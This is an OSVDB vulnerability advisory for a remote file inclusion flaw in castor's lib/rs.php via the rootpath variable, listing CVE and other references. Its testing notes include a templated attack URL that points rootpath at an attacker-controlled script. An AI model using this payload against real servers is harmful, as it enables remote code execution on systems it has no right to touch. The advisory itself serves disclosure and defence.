castor lib/rs.php rootpath Variable Remote File Inclusion

2006-10-21T10:33:50
ID OSVDB:29932
Type osvdb
Reporter OSVDB
Modified 2006-10-21T10:33:50

Description

Manual Testing Notes

http://[target]/[path]/lib/rs.php?rootpath=[Evil_Script]

References:

Secunia Advisory ID:22527 ISS X-Force ID: 29704 Generic Exploit URL: http://milw0rm.com/exploits/2606 FrSIRT Advisory: ADV-2006-4143 CVE-2006-5480 Bugtraq ID: 20658